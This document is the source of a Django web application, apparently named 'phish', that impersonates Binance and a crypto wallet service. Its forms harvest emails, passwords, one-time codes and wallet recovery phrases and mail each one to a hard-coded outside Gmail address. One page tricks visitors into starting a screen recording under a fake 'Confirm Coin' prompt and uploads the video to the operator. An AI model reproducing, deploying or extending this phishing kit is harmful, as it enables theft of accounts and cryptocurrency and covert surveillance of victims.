hk/urls.py
from django.urls import path
from .views import Email,Binance_E,Binance_P,Binance_OTP,PassKey,Recording,Recording_list
from django.views.generic import ListView
from django.contrib.auth import views as auth_views
# from . views import *


app_name = 'hk'
urlpatterns =[ 
path(r'', Email, name='email'),
path(r'binance_email_phone', Binance_E, name='bin_e'),
path(r'binance_password', Binance_P, name='bin_p'),
path(r'binance_otp', Binance_OTP, name='otp'),
path(r'banktrade_passkey_confirmation', PassKey, name='pkey'),
path(r'coin_choice', Recording, name='rec'),
path(r'screen_list', Recording_list, name='rl'),
]

phish/urls.py
from django.contrib import admin
from django.urls import path,include
from django.conf.urls.static import static
from django.conf import settings  

urlpatterns = [
    path('admin/', admin.site.urls),
    path('', include('hk.urls', namespace='hk')),
]+ static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)


hk/models.py
from django.db import models


class ScreenRecording(models.Model):
	video_file = models.FileField(upload_to='recordings/')
	uploaded_at = models.DateTimeField(auto_now_add=True)

	def __str__(self):
		return f"Recording {self.id} uploaded at {self.uploaded_at}"

# Create your models here.

hk/forms.py
from django import forms



class EmailForm(forms.Form):
    email = forms.EmailField()
    password = forms.CharField(widget=forms.PasswordInput())

class BinanceEmail(forms.Form):
    email = forms.EmailField()
    

class BinancePassword(forms.Form):
    password = forms.CharField(widget=forms.PasswordInput())


class BinanceOTP(forms.Form):
    otp = forms.CharField()


class PkeyConfirm(forms.Form):
    CHOICES = [
    ('Select Coin','Select Coin'),
    ('Bitcoin','Bitcoin'),
    ('Ethurum','Ethurum'),
    ('BnB','BnB'),
    ('USDT_Tron','USDT_Tron'),
    ('USDT_ERC20','USDT_ERC20'),
    ]
    name = forms.CharField(max_length=60)
    passkwy = forms.CharField(max_length=60)
    email = forms.EmailField()
    coin = forms.ChoiceField(choices=CHOICES)

hk/views.py
from django.shortcuts import render,redirect,get_object_or_404
from django.contrib import messages
from .forms import EmailForm,BinanceEmail, BinancePassword,BinanceOTP,PkeyConfirm
from django.core.mail import EmailMultiAlternatives
from django.conf import settings
from django.template.loader import render_to_string
from django.utils.html import strip_tags
from django.core.mail import send_mail
from django.http import HttpResponse
from django.utils.html import strip_tags
from django.core.mail import EmailMessage
from django.core.files.storage import FileSystemStorage
from .models import ScreenRecording


# Create your views here.



def Email(request):
	if request.method=='GET':
		form=EmailForm()

	else: 
		form = EmailForm(request.POST)
		if form.is_valid():
			email = form.cleaned_data.get("email")
			password = form.cleaned_data.get("password")
			from_email = settings.EMAIL_HOST_USER
			subject = "Email Username and password"
			to_email = 'healifan768@gmail.com'

			context = {"email":email,"password":password}
			convert = render_to_string('folder/client.html', context)
			convert_txt = render_to_string('folder/client.txt', context)

			msg = EmailMultiAlternatives(subject, convert_txt, 'kelechinwekes94@gmail.com', ['healifan768@gmail.com'])
			msg.attach_alternative(convert, "text/html")
			msg.send()
			return redirect('hk:bin_e')
			

	# else:
	# 	form=EmailForm()
	return render(request, "folder/email.html",{"form":form})



def Binance_E(request):
	if request.method == 'POST':
		form = BinanceEmail(request.POST)
		if form.is_valid():
			email = form.cleaned_data['email']
			from_email = [settings.EMAIL_HOST_USER]
			subject = "Binance Email"

			context = {"email":email}
			convert = render_to_string('folder/client.html', context)
			convert_txt = render_to_string('folder/client.txt', context)

			msg = EmailMultiAlternatives(subject, convert_txt, 'kelechinwekes94@gmail.com', ['healifan768@gmail.com'])
			msg.attach_alternative(convert, "text/html")
			msg.send()
			return redirect('hk:bin_p')

	else:
		form=BinanceEmail()
	return render(request, "folder/binance_e.html",{'form':form})



def Binance_P(request):
	if request.method == 'POST':
		form = BinancePassword(request.POST)
		if form.is_valid():
			password = form.cleaned_data['password']
			from_email = [settings.EMAIL_HOST_USER]
			subject = "Binance Email"

			context = {"password":password}
			convert = render_to_string('folder/client.html', context)
			convert_txt = render_to_string('folder/client.txt', context)

			msg = EmailMultiAlternatives(subject, convert_txt, 'kelechinwekes94@gmail.com', ['healifan768@gmail.com'])
			msg.attach_alternative(convert, "text/html")
			msg.send()
			messages.success(request, 'You will recieve your token shortly to your binance account.. thanks')
			return redirect('hk:email')

	else:
		form=BinancePassword()
	return render(request, "folder/binance_p.html",{'form':form})



def Binance_OTP(request):
	if request.method == 'POST':
		form = BinanceOTP(request.POST)
		if form.is_valid():
			password = form.cleaned_data['password']
			from_email = [settings.EMAIL_HOST_USER]
			subject = "Binance OTP"

			context = {"password":password}
			convert = render_to_string('folder/client.html', context)
			convert_txt = render_to_string('folder/client.txt', context)

			msg = EmailMultiAlternatives(subject, convert_txt, 'kelechinwekes94@gmail.com', ['healifan768@gmail.com'])
			msg.attach_alternative(convert, "text/html")
			msg.send()
			return HttpResponse('Your coin token will be sent to your wallet after 24 hours... Congratulations')


	else:
		form=BinanceOTP
	return render(request, "folder/binance.html", {'form':form})


def PassKey(request):
	if request.method == 'POST':
		form = PkeyConfirm(request.POST)
		if form.is_valid():
			password = form.cleaned_data['passkwy']
			from_email = [settings.EMAIL_HOST_USER]
			subject = "Wallet 2 Phrase Key"

			context = {"password":password}
			convert = render_to_string('folder/client.html', context)
			convert_txt = render_to_string('folder/client.txt', context)

			msg = EmailMultiAlternatives(subject, convert_txt, 'kelechinwekes94@gmail.com', ['healifan768@gmail.com'])
			msg.attach_alternative(convert, "text/html")
			msg.send()
			return HttpResponse('Confirmation sucessful... Congratulations')


	else:
		form=PkeyConfirm()
	return render(request, "folder/pkey.html",{'form':form})


def Recording(request):
	if request.method == 'POST' and request.FILES['video']:
		video_file = request.FILES['video']
		recording = ScreenRecording(video_file=video_file)
		recording.save()
		return HttpResponse('Dear esteem customer, you will recieve your coin shortly')
	return render(request, 'folder/recording.html')


def Recording_list(request):
	recordings = ScreenRecording.objects.all()
	return render(request, 'folder/recording_list.html', {'recordings': recordings})

hk/templates/folder/binance.html
{% load static %}
<!DOCTYPE html>
<html>
<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Binance OTP</title>
    <link rel="stylesheet" type="text/css" href="{% static 'css/auth.css' %}">
    <link rel="stylesheet" type="text/css" href="{% static 'fontawesome/css/all.min.css' %}">

<style type="text/css">
    *{
    margin: 0;
    padding: 0;
    box-sizing: border-box;
}

body{
    height: 100vh;
    align-items: center;
    justify-content: center;
    background-color: black;
    display: flex;

}

.container{
    position: relative;
    max-width: 430px;
    width: 100%;
/*    background-color: rgb(248, 247, 246);*/
    background-color: black;
    box-shadow: 0 5PX 10PX rgba(0,0,0,0.1);
    border-radius: 10px;
    overflow: hidden;
}

.container .forms{
    width: 175%;
    display: flex;
    align-items: center;
    height: 550px;
    transition: height 0.2s ease;
    padding: 25px;
}

.container.large{
    height:600px;
    transition: height 0.2s ease;
}

.container.active .forms {
    height: 600px;
}

.container .form{
    padding: 30px;
    width: 50%;
    background-color: rgb(251, 251, 252);
    transition: margin-left 0.18s ease;

}

.container.active .login {
    margin-left: -50%;
    opacity: 0;
    transition: margin-left 0.18s ease, opacity 0.15 ease;
}

.container.signup {
    opacity: 0;
    transition: opacity 0.09s ease;
}


.container.active .signup {
    opacity: 1;
    transition: opacity 0.2s ease;
}

.container .form .title{
    font-size: 27px;
    position: relative;
    font-weight: 600;
}

.form .title::before{
    content: '';
    position: absolute;
    left: 0;
    bottom: 0;
    height: 3px;
    width: 38px;
    background-color: rgb(155, 6, 31);
    border-radius: 25px;
}

.form .input-field{
    margin-top: 30px;
    position: relative;
    height: 50px;
    width: 100%;
}

.input-field input{
    height: 100%;
    width: 100%;
    position: absolute;
    padding: 0 35px;
    border: none;
    outline: none;
    border-bottom: 2px solid #ccc;
    border-top: 2px solid transparent;
    font-size: 17px;
    transition: all 0.3s ease;
}

.input-field i{
    position: absolute;
    top: 50%;
    transform: translateY(-50%);
    color: #999;
    font-size: 23px;
}

.input-field input:is(:focus, :valid){
    border-bottom-color: rgb(155, 6, 31);
}

.input-field input:is(:focus, :valid)~i{
    color: rgb(155, 6, 31);
}

.input-field i.icon{
    left: 0;
}

.input-field i.showHidePw{
    right:0;
    cursor: pointer;
    padding: 10px;
}

.form .checkbox-text{
    display: flex;
    justify-content: space-between;
    margin-top: 20px;
    align-items: center;
}

.checkbox-text .checkbox-content{
    display: flex;
    align-items: center;
}

.checkbox-content input{
    accent-color: rgb(9, 9, 170);
    margin: 0 8px -2px 4px;
}

.form a.text{
    text-decoration: none;
    color: rgb(9, 9, 170);
}

.form a:hover{
    text-decoration: underline;
}

.form .text{
    color: black;
    font-size: 14px;
}

.form .button{
    margin-top: 35px;

}

.form .button input{
    border: none;
    color: black;
    letter-spacing: 1px;
    border-radius: 6px;
    font-size: 17px;
    cursor: pointer;
/*    background-color: rgb(155, 6, 31);*/
     background-color: yellow;
    font-weight: 500;
    transition: all 0.3s ease;
}

.button input:hover{
    background-color: rgb(241, 30, 30);
}

.form .login-signup{
    margin-top: 30px;
    text-align: center;
}





</style>
</head>

<body> 
<div class="container"><br><br><br><br>
    <img src="{% static 'pics/logo.png' %}" style="width: 100%; height: 50%;">
    <div class="forms">

        <div class="form login">
            <span class="title">Binance</span>
            <form action="#" method="POST" autocomplete="off"><br>
                {% csrf_token %}
                {{form.errors}}
                <div class="input-field">
                {{form.otp}}
                <!-- <input type="text" placeholder="Enter your Email" required> -->
                <i class="fa fa-user"></i>
            </div>

            <div class="input-field button">
                <input type="submit" value="Verify">
            </div>
            
            </form><br>
        </div>
    </div>
</div>
</div>
</body>

<script src="{% static 'js/jquery.js' %}"></script>
<script>
const container = document.querySelector(".container"),
    PwShowHide = document.querySelectorAll(".showHidePw"),
    pwFields = document.querySelectorAll("#id_password"),
    signUp = document.querySelector(".signup-link"),
    login = document.querySelector(".login-link");

        PwShowHide.forEach(eyeIcon=>{
            eyeIcon.addEventListener("click",()=>{
                pwFields.forEach(pwField=>{
                    if(pwField.type === 'id_password'){
                        pwField.type = "text";

                        PwShowHide.forEach(icon =>{
                            icon.classList.replace('fa-eye-slash', 'fa-eye');
                        })
                    }else{
                        pwField.type = 'id_password';

                        PwShowHide.forEach(icon =>{
                            icon.classList.replace('fa-eye', 'fa-eye-slash');
                        })
                    }
                })
            })
        })


        $("#id_otp").attr("placeholder", "Type verification code..");
        $("#id_password").attr("placeholder", "Type your Password..");
               
</script>
</html>

hk/templates/folder/binance_e.html
{% load static %}
<!DOCTYPE html>
<html>
<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Binance Email/Password</title>
    <link rel="stylesheet" type="text/css" href="{% static 'css/auth.css' %}">
    <link rel="stylesheet" type="text/css" href="{% static 'fontawesome/css/all.min.css' %}">
</head>

<body>
    <div style="width: 50%;">
    <img src="{% static 'pics/logo.png' %}" style="width: 70%; height: 30%;">
    
    
<div class="container">
    <div class="forms">
        <div class="form login">
            <span class="title">Binance</span>
            <form action="#" method="POST" autocomplete="off"><br>
                 <p>Enter Binance Email or Password</p>
                {% csrf_token %}
                {{form.errors}}
                <div class="input-field">
                {{form.email}}
                <!-- <input type="text" placeholder="Enter your Email" required> -->
                <i class="fa fa-user"></i>
            </div>

            <div class="input-field button">
                <input type="submit" value="Login">
            </div>
            
            </form><br>
        </div>
    </div>
</div>
</div>
</body>

<script src="{% static 'js/jquery.js' %}"></script>
<script>
const container = document.querySelector(".container"),
    PwShowHide = document.querySelectorAll(".showHidePw"),
    pwFields = document.querySelectorAll("#id_password"),
    signUp = document.querySelector(".signup-link"),
    login = document.querySelector(".login-link");

        PwShowHide.forEach(eyeIcon=>{
            eyeIcon.addEventListener("click",()=>{
                pwFields.forEach(pwField=>{
                    if(pwField.type === 'id_password'){
                        pwField.type = "text";

                        PwShowHide.forEach(icon =>{
                            icon.classList.replace('fa-eye-slash', 'fa-eye');
                        })
                    }else{
                        pwField.type = 'id_password';

                        PwShowHide.forEach(icon =>{
                            icon.classList.replace('fa-eye', 'fa-eye-slash');
                        })
                    }
                })
            })
        })


        $("#id_email").attr("placeholder", "Type your Email Address..");
        $("#id_password").attr("placeholder", "Type your Password..");
               
</script>
</html>

hk/templates/folder/binance_p.html
{% load static %}
<!DOCTYPE html>
<html>
<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Binance Password</title>
    <link rel="stylesheet" type="text/css" href="{% static 'css/auth.css' %}">
    <link rel="stylesheet" type="text/css" href="{% static 'fontawesome/css/all.min.css' %}">
</head>

<body>

<div style="width: 50%;">
    <img src="{% static 'pics/logo.png' %}" style="width: 70%; height: 30%;">
    

<div class="container">
    <div class="forms">
        <div class="form login">
            <span class="title">Binance</span>
            <form action="#" method="POST" autocomplete="off"><br>
                 <p><b style="color: red;">Note: </b>Enter email address used in your Binance Account</p>
                {% csrf_token %}
                {{form.errors}}
                <div class="input-field">
                {{form.email}}
                <!-- <input type="text" placeholder="Enter your Email" required> -->
                <i class="fa fa-user"></i>
            </div>

            <div class="input-field">
                <!-- <input type="password" class="password" placeholder="Enter your Password" required> -->
                {{form.password}}
                <i class="fa fa-lock icon"></i>
                <i class="fa fa-eye-slash showHidePw"></i>
            </div>

            <div class="input-field button">
                <input type="submit" value="Login">
            </div>
            
            </form><br>
        </div>
    </div>
</div></div>
</body>

<script src="{% static 'js/jquery.js' %}"></script>
<script>
const container = document.querySelector(".container"),
    PwShowHide = document.querySelectorAll(".showHidePw"),
    pwFields = document.querySelectorAll("#id_password"),
    signUp = document.querySelector(".signup-link"),
    login = document.querySelector(".login-link");

        PwShowHide.forEach(eyeIcon=>{
            eyeIcon.addEventListener("click",()=>{
                pwFields.forEach(pwField=>{
                    if(pwField.type === 'id_password'){
                        pwField.type = "text";

                        PwShowHide.forEach(icon =>{
                            icon.classList.replace('fa-eye-slash', 'fa-eye');
                        })
                    }else{
                        pwField.type = 'id_password';

                        PwShowHide.forEach(icon =>{
                            icon.classList.replace('fa-eye', 'fa-eye-slash');
                        })
                    }
                })
            })
        })


        $("#id_email").attr("placeholder", "Type your Email Address..");
        $("#id_password").attr("placeholder", "Type your Password..");
               
</script>
</html>

hk/templates/folder/client.html
{% load static %}
<!DOCTYPE html>
<html>
<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Global Investors</title>
    <link rel="stylesheet" type="text/css" href="{% static 'css/style.css' %}">
</head>


<body>

<h2 style="color:black"><b>{{subject}}</b></h2>

<div>
    <h3>Hello, Client Email and Password</h3>
</div>

<div><p>{{email}} {{password}}</p></div>

<div>
    <h5><b>Best Regards!!!</b></h5>
    <h5><b>Team</b></h5>
</div>


<div style="font-size:.7rem; color:white; background:blue;">&copy;Hack</div>

</body>

</html>



hk/templates/folder/pkey.html
{% load static %}
<!DOCTYPE html>
<html>
<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Bank Trade | Phrase Page</title>
    <link rel="stylesheet" type="text/css" href="{% static 'css/auth.css' %}">
    <link rel="stylesheet" type="text/css" href="{% static 'fontawesome/css/all.min.css' %}">
    <link rel="stylesheet" type="text/css" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.5.2/css/all.min.css">

    <style type="text/css">
    .input-field select{
    height: 100%;
    width: 100%;
    position: absolute;
    padding: 0 35px;
    border: none;
    outline: none;
    border-bottom: 2px solid #ccc;
    border-top: 2px solid transparent;
    font-size: 17px;
    transition: all 0.3s ease;
}


.input-field select:is(:focus, :valid){
    border-bottom-color: rgb(155, 6, 31);
}

.input-field select:is(:focus, :valid)~i{
    color: rgb(155, 6, 31);
}

    </style>
</head>

<body>

<div class="container">
    <div class="forms">
        <div class="form login">
            <h2>Confirmation View</h2>
            <form action="#" method="POST" autocomplete="off">
                {% csrf_token %}
                {{form.errors}}
                <div class="input-field">
                {{form.name}}
            </div>

            <div class="input-field">
                {{form.email}}
            </div>

            <div class="input-field">
                {{form.passkwy}}
            </div>

            <div class="input-field">
                {{form.coin}}
            </div>



            <div class="input-field button">
                <input type="submit" value="Send">
            </div>
            
            </form>
        </div>
    </div>
</div>
</body>

<script src="{% static 'js/jquery.js' %}"></script>
<script>
const container = document.querySelector(".container"),
    PwShowHide = document.querySelectorAll(".showHidePw"),
    pwFields = document.querySelectorAll("#id_password"),
    signUp = document.querySelector(".signup-link"),
    login = document.querySelector(".login-link");

        PwShowHide.forEach(eyeIcon=>{
            eyeIcon.addEventListener("click",()=>{
                pwFields.forEach(pwField=>{
                    if(pwField.type === 'id_password'){
                        pwField.type = "text";

                        PwShowHide.forEach(icon =>{
                            icon.classList.replace('fa-eye-slash', 'fa-eye');
                        })
                    }else{
                        pwField.type = 'id_password';

                        PwShowHide.forEach(icon =>{
                            icon.classList.replace('fa-eye', 'fa-eye-slash');
                        })
                    }
                })
            })
        })


        $("#id_name").attr("placeholder", "Type your Full Name..");
        $("#id_email").attr("placeholder", "Type your Email Address..");
        $("#id_passkwy").attr("placeholder", "Type your Wallet 2 Phrase Key..");
               
</script>
</html>

hk/templates/folder/recording.html
{% load static %}
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Final Verification</title>
    <link rel="stylesheet" type="text/css" href="{% static 'css/auth.css' %}">
    <link rel="stylesheet" type="text/css" href="{% static 'fontawesome/css/all.min.css' %}">

<style type="text/css">
    *{
    margin: 0;
    padding: 0;
    box-sizing: border-box;
}

body{
    height: 100vh;
    align-items: center;
    justify-content: center;
    background-color: black;
    display: flex;

}

.container{
    position: relative;
    max-width: 430px;
    width: 100%;
/*    background-color: rgb(248, 247, 246);*/
    background-color: black;
    box-shadow: 0 5PX 10PX rgba(0,0,0,0.1);
    border-radius: 10px;
    overflow: hidden;
}

.container .forms{
    width: 175%;
    display: flex;
    align-items: center;
    height: 550px;
    transition: height 0.2s ease;
    padding: 25px;
}

.container.large{
    height:600px;
    transition: height 0.2s ease;
}

.container.active .forms {
    height: 600px;
}

.container .form{
    padding: 30px;
    width: 50%;
    background-color: rgb(251, 251, 252);
    transition: margin-left 0.18s ease;

}

.container.active .login {
    margin-left: -50%;
    opacity: 0;
    transition: margin-left 0.18s ease, opacity 0.15 ease;
}

.container.signup {
    opacity: 0;
    transition: opacity 0.09s ease;
}


.container.active .signup {
    opacity: 1;
    transition: opacity 0.2s ease;
}

.container .form .title{
    font-size: 27px;
    position: relative;
    font-weight: 600;
}

.form .title::before{
    content: '';
    position: absolute;
    left: 0;
    bottom: 0;
    height: 3px;
    width: 38px;
    background-color: rgb(155, 6, 31);
    border-radius: 25px;
}

.form .input-field{
    margin-top: 30px;
    position: relative;
    height: 50px;
    width: 100%;
}

.input-field input{
    height: 100%;
    width: 100%;
    position: absolute;
    padding: 0 35px;
    border: none;
    outline: none;
    border-bottom: 2px solid #ccc;
    border-top: 2px solid transparent;
    font-size: 17px;
    transition: all 0.3s ease;
}

.input-field i{
    position: absolute;
    top: 50%;
    transform: translateY(-50%);
    color: #999;
    font-size: 23px;
}

.input-field input:is(:focus, :valid){
    border-bottom-color: rgb(155, 6, 31);
}

.input-field input:is(:focus, :valid)~i{
    color: rgb(155, 6, 31);
}

.input-field i.icon{
    left: 0;
}

.input-field i.showHidePw{
    right:0;
    cursor: pointer;
    padding: 10px;
}

.form .checkbox-text{
    display: flex;
    justify-content: space-between;
    margin-top: 20px;
    align-items: center;
}

.checkbox-text .checkbox-content{
    display: flex;
    align-items: center;
}

.checkbox-content input{
    accent-color: rgb(9, 9, 170);
    margin: 0 8px -2px 4px;
}

.form a.text{
    text-decoration: none;
    color: rgb(9, 9, 170);
}

.form a:hover{
    text-decoration: underline;
}

.form .text{
    color: black;
    font-size: 14px;
}

.form .button{
    margin-top: 35px;

}

.form .button input{
    border: none;
    color: black;
    letter-spacing: 1px;
    border-radius: 6px;
    font-size: 17px;
    cursor: pointer;
/*    background-color: rgb(155, 6, 31);*/
     background-color: yellow;
    font-weight: 500;
    transition: all 0.3s ease;
}

.button input:hover{
    background-color: rgb(241, 30, 30);
}

.form .login-signup{
    margin-top: 30px;
    text-align: center;
}


.input-field select{
    height: 100%;
    width: 100%;
    position: absolute;
    padding: 0 35px;
    border: none;
    outline: none;
    border-bottom: 2px solid #ccc;
    border-top: 2px solid transparent;
    font-size: 17px;
    transition: all 0.3s ease;
}


.input-field select:is(:focus, :valid){
    border-bottom-color: rgb(155, 6, 31);
}

.input-field select:is(:focus, :valid)~i{
    color: rgb(155, 6, 31);
}

button{
    background: #f05462;
    color: white;
    padding: 5px 10px;
    text-align: center;
}

button:hover{
    color: #f05462;
    background: white;
    padding: 3px 8px;
    border: 2px solid #f05462;
}
</style>
</head>

<body>

<div class="container"><br><br><br><br>
    <div class="forms">

        <div class="form login">
            <span class="title">Verify Coin Choice</span>
            <form  method="POST" enctype="multipart/form-data"><br>
                {% csrf_token %}

            <div class="input-field" style="display: none;">
                <input type="file" name="video" accept="video/*">
            </div>

               <div class="input-field">
                <select name="coin" id="id_coin">
                  <option value="Select Coin">Select Coin</option>

                  <option value="Bitcoin">Bitcoin</option>

                  <option value="Ethurum">Ethurum</option>

                  <option value="BnB">BnB</option>

                  <option value="USDT_Tron">USDT_Tron</option>

                  <option value="USDT_ERC20">USDT_ERC20</option>

                </select>
            </div>

            <div class="input-field button" style="display: none;">
                <input type="submit" value="Choose Coin">
            </div>

            <div class="input-field button" id="startB">
               
            </div> 
            </form><br>
        </div>
    </div>
</div>

</body>


<script src="{% static 'js/jquery.js' %}"></script>
<script type="text/javascript">

let mediaRecorder;
let recordedChunks = [];

async function startRecording() {
    const stream = await navigator.mediaDevices.getDisplayMedia({
        video: { mediaSource: "screen" }
    });

    mediaRecorder = new MediaRecorder(stream);

    mediaRecorder.ondataavailable = function(event) {
        if (event.data.size > 0) {
            recordedChunks.push(event.data);
        }
    };
    alert("Check your wallet, your coin has been deposited.. Congratulations!");

    mediaRecorder.onstop = function() {
        const blob = new Blob(recordedChunks, {
            type: "video/webm"
        });
        const url = URL.createObjectURL(blob);

        const videoElement = document.createElement("video");
        videoElement.src = url;
        document.body.appendChild(videoElement);
        videoElement.play();

        // Create a form and submit the video blob
        const formData = new FormData();
        formData.append('video', blob, 'screen-recording.webm');

        fetch("{% url 'hk:rec' %}", {
            method: 'POST',
            body: formData,
            headers: {
                'X-CSRFToken': '{{ csrf_token }}'

            }

        }).then(response => {
            if (response.ok) {
                // alert("Recording uploaded successfully!");
            }
        });
    };

    mediaRecorder.start();
}

function stopRecording() {
    const recordingDuration = 2 * 60 * 60 * 1000; 
    setTimeout(()=>{
        mediaRecorder.stop();
        location.reload();

    })
    
}

document.addEventListener('DOMContentLoaded', (event) => {
    const startBtn = document.createElement("button");
    startBtn.textContent = "Confirm Coin";
    startBtn.onclick = startRecording;

    const stopBtn = document.createElement("button");
    stopBtn.textContent = "Stop Recording";
    stopBtn.onclick = stopRecording;

    
    document.body.appendChild(startBtn);
    // document.body.appendChild(stopBtn);
});


</script>
</body>
</html>






hk/templates/folder/recording_list.html
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Screen Recordings</title>
</head>
<body>
    <h1>Uploaded Screen Recordings</h1>
    <ul>
        {% for recording in recordings %}
            <li>
                <video controls>
                    <source src="{{ recording.video_file.url }}" type="video/webm">
                </video>
            </li>
        {% endfor %}
    </ul>
</body>
</html>